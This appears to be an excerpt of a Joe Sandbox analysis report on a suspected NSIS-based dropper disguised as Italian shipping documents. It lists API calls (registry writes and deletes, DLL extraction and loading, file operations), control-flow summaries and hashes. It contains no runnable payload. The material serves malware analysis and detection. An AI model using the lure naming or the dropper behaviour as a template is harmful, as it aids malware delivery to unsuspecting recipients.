                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                        • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                        • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                        • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 870 401c48-401c68 call 402d89 * 2 875 401c74-401c78 870->875 876 401c6a-401c71 call 402dab 870->876 878 401c84-401c8a 875->878 879 401c7a-401c81 call 402dab 875->879 876->875 882 401cd8-401d02 call 402dab * 2 FindWindowExW 878->882 883 401c8c-401ca8 call 402d89 * 2 878->883 879->878 895 401d08 882->895 893 401cc8-401cd6 SendMessageW 883->893 894 401caa-401cc6 SendMessageTimeoutW 883->894 893->895 896 401d0b-401d0e 894->896 895->896 897 401d14 896->897 898 402c2f-402c3e 896->898 897->898
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                        • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                        • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                        • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 901 40248f-4024c0 call 402dab * 2 call 402e3b 908 4024c6-4024d0 901->908 909 402c2f-402c3e 901->909 910 4024d2-4024df call 402dab lstrlenW 908->910 911 4024e3-4024e6 908->911 910->911 914 4024e8-4024f9 call 402d89 911->914 915 4024fa-4024fd 911->915 914->915 917 40250e-402522 RegSetValueExW 915->917 918 4024ff-402509 call 4032b9 915->918 923 402524 917->923 924 402527-402608 RegCloseKey 917->924 918->917 923->924 924->909 926 402933-40293a 924->926 926->909
                                        APIs
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000023,00000011,00000002), ref: 004024DA
                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,00000011,00000002), ref: 0040251A
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,00000011,00000002), ref: 00402602
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CloseValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp
                                        • API String ID: 2655323295-1031832637
                                        • Opcode ID: f78f700b530699748f9fad481ce2e67ea2ae6cf6ef13030ba4708d919309f38a
                                        • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                        • Opcode Fuzzy Hash: f78f700b530699748f9fad481ce2e67ea2ae6cf6ef13030ba4708d919309f38a
                                        • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00406094
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-678247507
                                        • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                        • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                        • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                        • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
                                        APIs
                                          • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405EDF
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                          • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\acneform,?,00000000,000000F0), ref: 00401652
                                        Strings
                                        • C:\Users\user\AppData\Local\acneform, xrefs: 00401645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\acneform
                                        • API String ID: 1892508949-531015130
                                        • Opcode ID: 3fdecb0bba39e703bf4163983f1431fe553617167f418b1ef3a8f15efc1dcdc7
                                        • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                        • Opcode Fuzzy Hash: 3fdecb0bba39e703bf4163983f1431fe553617167f418b1ef3a8f15efc1dcdc7
                                        • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
                                        APIs
                                        • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Exec,?,00000000,00406696,80000002), ref: 0040646B
                                        • RegCloseKey.KERNELBASE(?), ref: 00406476
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: Exec
                                        • API String ID: 3356406503-459137531
                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 334405425-0
                                        • Opcode ID: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
                                        • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                        • Opcode Fuzzy Hash: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
                                        • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                        APIs
                                          • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                          • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                        • lstrlenW.KERNEL32 ref: 00402344
                                        • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                        • String ID:
                                        • API String ID: 1486964399-0
                                        • Opcode ID: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
                                        • Instruction ID: 885267ae01076befc9d2550e8446c8d72b56611081dd9eb5b5e506e95b58587e
                                        • Opcode Fuzzy Hash: 0f4398602f2a15397442c9cb80a4579519cf27728a25c26cde818a96ec5f227a
                                        • Instruction Fuzzy Hash: 04117071900318AADB10EFB9D90AA9EB6F8AF14354F20543FA401F72D1DBB88941CB59
                                        APIs
                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,00000011,00000002), ref: 00402602
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Enum$CloseValue
                                        • String ID:
                                        • API String ID: 397863658-0
                                        • Opcode ID: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
                                        • Instruction ID: 3ff9118d8f065173f4d59a226331d9f1933cb8120024fa56e57d9af690fc2804
                                        • Opcode Fuzzy Hash: a30a11a05d1993aef0f7726c39992e41007362dd6c4f729a0cb4b13ed53f7ac1
                                        • Instruction Fuzzy Hash: 16017171904105ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB85E40A66D
                                        APIs
                                          • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                          • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                        • GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402045
                                        • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402064
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                        • String ID:
                                        • API String ID: 2520467145-0
                                        • Opcode ID: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
                                        • Instruction ID: 763ad8e8b63f2924b10e93d9a85bf0a11dc22f08f43b137c8aa05ca7cc66be5b
                                        • Opcode Fuzzy Hash: 437d11790d74782efc94b12913d614b64cca238e61eba87ae2d2cc7f25da6320
                                        • Instruction Fuzzy Hash: E7213871900208AFDB11DFE5C985EEEBBB4EF08354F11402AFA05B62D0D7759E51DB64
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                        • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                        • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                        • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                        APIs
                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: CloseDeleteValue
                                        • String ID:
                                        • API String ID: 2831762973-0
                                        • Opcode ID: ac608fdb2779203a5befd5ae41b504f19679aceccba4adcfaa0019147e4ceade
                                        • Instruction ID: 0b96b132e490ce7cd6ce1444893b6524bba18796501a832965f154b7c78b6e42
